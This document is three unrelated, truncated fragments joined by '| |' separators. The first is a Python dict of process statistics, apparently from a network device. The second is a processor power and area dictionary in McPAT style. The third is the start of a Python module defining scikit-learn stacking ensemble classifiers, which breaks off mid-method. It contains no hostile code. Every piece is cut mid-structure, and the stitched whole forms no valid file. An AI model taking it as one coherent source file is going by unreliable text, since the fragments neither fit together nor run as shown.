'five_sec': '0%',
'name': 'scansta',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'159': {'five_min': '0%',
'five_sec': '0%',
'name': 'kacpi_hotplug',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'16': {'five_min': '0%',
'five_sec': '0%',
'name': 'desched/0',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'1630': {'five_min': '0%',
'five_sec': '0%',
'name': 'pcscd',
'one_min': '0%',
'ppid': 31695,
'size': 10375168,
'status': 'S'},
'1689': {'five_min': '0%',
'five_sec': '0%',
'name': 'rotee',
'one_min': '0%',
'ppid': 1,
'size': 4927488,
'status': 'S'},
'17': {'five_min': '0%',
'five_sec': '0%',
'name': 'migration/1',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'1706': {'five_min': '0%',
'five_sec': '0%',
'name': 'rotee',
'one_min': '0%',
'ppid': 1,
'size': 4927488,
'status': 'S'},
'1750': {'five_min': '0%',
'five_sec': '0%',
'name': 'pman.sh',
'one_min': '0%',
'ppid': 27708,
'size': 4431872,
'status': 'S'},
'17957': {'five_min': '0%',
'five_sec': '0%',
'name': 'rotee',
'one_min': '0%',
'ppid': 1,
'size': 4927488,
'status': 'S'},
'1796': {'five_min': '0%',
'five_sec': '0%',
'name': 'rotee',
'one_min': '0%',
'ppid': 1,
'size': 4927488,
'status': 'S'},
'18': {'five_min': '0%',
'five_sec': '0%',
'name': 'stopper/1',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'18040': {'five_min': '0%',
'five_sec': '0%',
'name': 'rotee',
'one_min': '0%',
'ppid': 1,
'size': 4927488,
'status': 'S'},
'18056': {'five_min': '0%',
'five_sec': '0%',
'name': 'inotifywait',
'one_min': '0%',
'ppid': 14898,
'size': 1761280,
'status': 'S'},
'18100': {'five_min': '0%',
'five_sec': '0%',
'name': 'inotifywait',
'one_min': '0%',
'ppid': 14905,
'size': 1761280,
'status': 'S'},
'19': {'five_min': '0%',
'five_sec': '0%',
'name': 'sirq-high/1',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'1900': {'five_min': '0%',
'five_sec': '0%',
'name': 'plogd',
'one_min': '0%',
'ppid': 32339,
'size': 20828160,
'status': 'S'},
'2': {'five_min': '0%',
'five_sec': '0%',
'name': 'kthreadd',
'one_min': '0%',
'ppid': 0,
'size': 0,
'status': 'S'},
'20': {'five_min': '0%',
'five_sec': '0%',
'name': 'sirq-timer/1',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'21': {'five_min': '0%',
'five_sec': '0%',
'name': 'sirq-net-tx/1',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'2160': {'five_min': '0%',
'five_sec': '0%',
'name': 'rotee',
'one_min': '0%',
'ppid': 1,
'size': 4927488,
'status': 'S'},
'21718': {'five_min': '0%',
'five_sec': '0%',
'name': 'mcp_chvrf.sh',
'one_min': '0%',
'ppid': 1,
'size': 2560000,
'status': 'S'},
'21719': {'five_min': '0%',
'five_sec': '0%',
'name': 'mcp_chvrf.sh',
'one_min': '0%',
'ppid': 1,
'size': 2560000,
'status': 'S'},
'21721': {'five_min': '0%',
'five_sec': '0%',
'name': 'sntp',
'one_min': '0%',
'ppid': 1,
'size': 1867776,
'status': 'S'},
'21722': {'five_min': '0%',
'five_sec': '0%',
'name': 'rollback_timer.',
'one_min': '0%',
'ppid': 1,
'size': 3059712,
'status': 'S'},
'21726': {'five_min': '0%',
'five_sec': '0%',
'name': 'xinetd',
'one_min': '0%',
'ppid': 21718,
'size': 2187264,
'status': 'S'},
'21727': {'five_min': '0%',
'five_sec': '0%',
'name': 'oom.sh',
'one_min': '0%',
'ppid': 1,
'size': 3026944,
'status': 'S'},
'21729': {'five_min': '0%',
'five_sec': '0%',
'name': 'xinetd',
'one_min': '0%',
'ppid': 21719,
'size': 2187264,
'status': 'S'},
'21734': {'five_min': '0%',
'five_sec': '0%',
'name': 'iptbl.sh',
'one_min': '0%',
'ppid': 1,
'size': 3710976,
'status': 'S'},
'21737': {'five_min': '0%',
'five_sec': '0%',
'name': 'libvirtd.sh',
'one_min': '0%',
'ppid': 1,
'size': 2551808,
'status': 'S'},
'21742': {'five_min': '0%',
'five_sec': '0%',
'name': 'libvirtd',
'one_min': '0%',
'ppid': 21737,
'size': 22347776,
'status': 'S'},
'22': {'five_min': '0%',
'five_sec': '0%',
'name': 'sirq-net-rx/1',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'22012': {'five_min': '0%',
'five_sec': '0%',
'name': 'rotee',
'one_min': '0%',
'ppid': 1,
'size': 4927488,
'status': 'S'},
'22049': {'five_min': '0%',
'five_sec': '0%',
'name': 'inotifywait',
'one_min': '0%',
'ppid': 21734,
'size': 1757184,
'status': 'S'},
'22052': {'five_min': '0%',
'five_sec': '0%',
'name': 'rotee',
'one_min': '0%',
'ppid': 1,
'size': 4927488,
'status': 'S'},
'22054': {'five_min': '0%',
'five_sec': '0%',
'name': 'rotee',
'one_min': '0%',
'ppid': 1,
'size': 4927488,
'status': 'S'},
'22086': {'five_min': '0%',
'five_sec': '0%',
'name': 'inotifywait',
'one_min': '0%',
'ppid': 21722,
'size': 1757184,
'status': 'S'},
'22097': {'five_min': '0%',
'five_sec': '0%',
'name': 'sleep',
'one_min': '0%',
'ppid': 21727,
'size': 1929216,
'status': 'S'},
'23': {'five_min': '0%',
'five_sec': '0%',
'name': 'sirq-block/1',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'23402': {'five_min': '0%',
'five_sec': '0%',
'name': 'chasync.sh',
'one_min': '0%',
'ppid': 1,
'size': 4034560,
'status': 'S'},
'23672': {'five_min': '0%',
'five_sec': '0%',
'name': 'rotee',
'one_min': '0%',
'ppid': 1,
'size': 4927488,
'status': 'S'},
'23740': {'five_min': '0%',
'five_sec': '0%',
'name': 'inotifywait',
'one_min': '0%',
'ppid': 23402,
'size': 1761280,
'status': 'S'},
'24': {'five_min': '0%',
'five_sec': '0%',
'name': 'sirq-block-iopo',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'25': {'five_min': '0%',
'five_sec': '0%',
'name': 'sirq-tasklet/1',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'26': {'five_min': '0%',
'five_sec': '0%',
'name': 'sirq-sched/1',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'2648': {'five_min': '0%',
'five_sec': '0%',
'name': 'rpciod/0',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'2649': {'five_min': '0%',
'five_sec': '0%',
'name': 'rpciod/1',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'2655': {'five_min': '0%',
'five_sec': '0%',
'name': 'nfsiod',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'27': {'five_min': '0%',
'five_sec': '0%',
'name': 'sirq-hrtimer/1',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'275': {'five_min': '0%',
'five_sec': '0%',
'name': 'ata/0',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'27578': {'five_min': '0%',
'five_sec': '0%',
'name': 'klogd',
'one_min': '0%',
'ppid': 1,
'size': 1654784,
'status': 'S'},
'276': {'five_min': '0%',
'five_sec': '0%',
'name': 'ata/1',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'277': {'five_min': '0%',
'five_sec': '0%',
'name': 'ata_aux',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'27708': {'five_min': '0%',
'five_sec': '0%',
'name': 'pvp.sh',
'one_min': '0%',
'ppid': 1,
'size': 4521984,
'status': 'S'},
'27791': {'five_min': '0%',
'five_sec': '0%',
'name': 'rotee',
'one_min': '0%',
'ppid': 1,
'size': 4927488,
'status': 'S'},
'2794': {'five_min': '4%',
'five_sec': '0%',
'name': 'smand',
'one_min': '4%',
'ppid': 1269,
'size': 154185728,
'status': 'S'},
'28': {'five_min': '0%',
'five_sec': '0%',
'name': 'sirq-rcu/1',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'28080': {'five_min': '0%',
'five_sec': '0%',
'name': 'inotifywait',
'one_min': '0%',
'ppid': 27708,
'size': 1761280,
'status': 'S'},
'281': {'five_min': '0%',
'five_sec': '0%',
'name': 'khubd',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'28156': {'five_min': '0%',
'five_sec': '0%',
'name': 'pman.sh',
'one_min': '0%',
'ppid': 27708,
'size': 4427776,
'status': 'S'},
'28264': {'five_min': '0%',
'five_sec': '0%',
'name': 'pman.sh',
'one_min': '0%',
'ppid': 27708,
'size': 4407296,
'status': 'S'},
'2833': {'five_min': '0%',
'five_sec': '0%',
'name': 'psd',
'one_min': '0%',
'ppid': 824,
'size': 20340736,
'status': 'S'},
'28362': {'five_min': '0%',
'five_sec': '0%',
'name': 'rotee',
'one_min': '0%',
'ppid': 1,
'size': 4927488,
'status': 'S'},
'284': {'five_min': '0%',
'five_sec': '0%',
'name': 'kseriod',
'one_min': '0%',
'ppid': 2,
'size': 0,
'status': 'S'},
'28464': {'five_min': '0%',
'five_sec': '0%',
'name': 'pman.sh',
'one_min': '0%',
'ppid': 27708,
'size': 4407296,
'status': 'S'},
'28562': {'five_min': '0%',
'five_sec': '0%',
'name': 'rotee',
'one_min': '0%',
'ppid': 1,
'size': 4927488,
'status': 'S'},
'28801': {'five_min': '0%',
| |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0543263,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.245359,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.255278,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.586053,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 1.01483,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.582035,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 2.18292,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.540152,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.43388,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0482275,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0212449,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.175515,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.157119,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.223743,
'Execution Unit/Register Files/Runtime Dynamic': 0.178364,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.439,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 1.26296,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 4.27498,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00251342,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00251342,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00218375,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000842395,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00225703,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00946762,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0242926,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.151043,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.418377,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.513008,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96874,
'Instruction Fetch Unit/Runtime Dynamic': 1.11619,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0343782,
'L2/Runtime Dynamic': 0.0108983,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 6.75935,
'Load Store Unit/Data Cache/Runtime Dynamic': 2.671,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.178657,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.178657,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 7.60645,
'Load Store Unit/Runtime Dynamic': 3.73073,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.440539,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.881077,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.156349,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.156777,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0688451,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.82879,
'Memory Management Unit/Runtime Dynamic': 0.225623,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 28.4339,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.168255,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0319922,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.31027,
'Renaming Unit/Int Front End RAT/Subthreshold | |
import pandas as pd
import numpy as np
from copy import deepcopy
import warnings
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.model_selection import cross_val_predict
from sklearn.model_selection import KFold, StratifiedKFold
from sklearn.externals.joblib import Parallel, delayed
from gravity_learn.utils import (force_array,
check_cv,
fit_model,
check_is_fitted)
__all__ = ['EnsemblerClassifier',
'QuickStackClassifier',
'FullStackClassifier']
class EnsemblerClassifier(BaseEstimator, TransformerMixin):
# TODO: require df? how to pass Yfactory in
"""
This is a class to ensemble a set of given base models. The assumption
is that those models are tuned (hyperparameters chosen). It works as
follows.
It accepts a dictionary of base models, the ensembler to combine them,
a number of folds (to be used in the cross validation strategy) and
a random state (to be used in the cross val strategy)
The fit method:
The ensemblers iterates through the base models, doing two things:
- determining out of sample predictions (so n_folds fit-predict
combinations). This is used for fitting the ensembler next.
- fit the base model to the full data, which is used for the
ensemblers predict method
Notice this implies we have n_folds + 1 fits for each base model.
With these out of sample predictions, it determines the parameters
of the ensemblers.
The predict method:
Determines the predictions of each of the base models and then
combines them with the fitted ensembler.
"""
def __init__(self, base_models, ensembler_est, n_folds, random_state=0):
"""
Parameters
----------
base_models : a dictionary of model name/model pairs
ensembler_est : an ensembler to combine the outputs of the base
model
n_folds : the number of folds to use when estimating the parameters
of the ensemblers. Note: Ideally, n_folds should be high, because
it makes the size of the base model fit for predictions and the
base model fit for ensembler calibration more similar.
random_state : the random state to use in the cross validaiton
strategy
"""
self.base_models = base_models
self.ensembler_est = ensembler_est
self.n_folds = n_folds
self.random_state = random_state
self.fitted_base_models = {}
self.model_order = []
warnings.warn('EnsemblerClassifier is deprecated, '
'please use FullStackClassifier instead',
DeprecationWarning)
def fit(self, X, y):
cv = StratifiedKFold(
n_splits=self.n_folds,
shuffle=True,
random_state=self.random_state
)
base_predictions = {}
for name, model in self.base_models.items():
# This is for determining the ensembler parameters
base_predictions[name] = cross_val_predict(
model, X, y, cv=cv, method='predict_proba'
)[:, 1]
# This for the ensembler.predict method
self.fitted_base_models[name] = model.fit(X, y)
self.model_order.append(name)
base_predictions = pd.DataFrame(
base_predictions,
index=X.index
)[self.model_order]
self.ensembler_est.fit(base_predictions, y)
return self
def predict_proba(self, X):
base_predictions = {}
for name, model in self.fitted_base_models.items():
base_predictions[name] = model.predict_proba(X)[:, 1]
base_predictions = pd.DataFrame(
base_predictions,
index=X.index
)[self.model_order]
return self.ensembler_est.predict_proba(base_predictions)
class QuickStackClassifier(BaseEstimator):
"""
This class has a similar stacking structure but also is scalable,
which means, it's objective to save computing run time on training
in-sample-fold and outputing out-of-fold predictions for fitting ensembler
Instead of doing K-fold training for each base model, it does only one-fold
To have a good performance, it requires ensembler to be a simple model with
only a few parameters to tune
Parameters
----------
base_models : list of (string, base_model) tuples. The first
half of each tuple is the group name of the pipeline.
ensembler : an ensembler to combine the outputs of the base models
proba : bool, if True, model will implement predict_proba when it
gets called
full_train : bool, if True, its base models are trained with 100% data
again and they are used for generating probas for new data
Default is True
cv : int, cross-validation generator or an iterable, optional
Determines the cross-validation splitting strategy.
Possible inputs for cv are:
- None, to use the default 3-fold cross validation,
- integer, to specify the number of folds in a `(Stratified)KFold`,
- An object to be used as a cross-validation generator.
- An iterable yielding train, test splits.
n_jobs : integer, optional
The number of CPUs to use to do the computation. -1 means
'all CPUs'.
verbose : integer, optional
The verbosity level.
"""
def __init__(self, base_models, ensembler, proba=True,
full_train=True, cv=None, n_jobs=1, verbose=0):
self.base_models = list(base_models)
self.ensembler = ensembler
self.proba = proba
self.full_train = full_train
self.cv = cv
self.n_jobs = n_jobs
self.verbose = verbose
if self.cv is None:
self.cv = KFold(n_splits=3, shuffle=True)
warnings.warn('QuickStackClassifier is deprecated, '
'please use FullStackClassifier instead',
DeprecationWarning)
def get_params(self, deep=True):
return self.ensembler.get_params(deep=deep)
def set_params(self, **params):
return self.ensembler.set_params(**params)
def _fit(self, X, y, *args, **kwargs):
"""
private method to train n base models for last fold of cv
"""
# get list of folds of indices
self.last_fold = list(check_cv(self.cv).split(X, y))[-1]
self.in_fold = self.last_fold[0]
self.out_of_fold = self.last_fold[-1]
# Paralellization
parallel = Parallel(n_jobs=self.n_jobs, verbose=self.verbose)
if isinstance(X, pd.DataFrame):
if not isinstance(y, (pd.Series, pd.DataFrame)):
y = pd.DataFrame(y)
self.fitted_models = parallel(delayed(fit_model)(
model=deepcopy(model),
X=X.iloc[self.in_fold],
y=y.iloc[self.in_fold],
*args,
**kwargs
) for (_, model) in self.base_models
)
else: # X is not a dataframe
self.fitted_models = parallel(delayed(fit_model)(
model=deepcopy(model),
X=X[self.in_fold],
y=force_array(y)[self.in_fold],
*args,
**kwargs
) for (_, model) in self.base_models
)
# train model with full 100% data
if self.full_train:
self.full_fitted_models = parallel(delayed(fit_model)(
model=deepcopy(model),
X=X,
y=y,
*args,
**kwargs
) for (_, model) in self.base_models
)
def fit(self, X, y, *args, **kwargs):
"""
fit method is the method for fitting the ensembler and the trainning
data is out-of-fold predictions from base_models
"""
# call _fit
self._fit(X, y, *args, **kwargs)
# generate out-of-sample predictions and reserve same order!!
proba_dfs = []
if isinstance(X, pd.DataFrame):
for i, model in enumerate(self.fitted_models):
df_proba = pd.DataFrame(
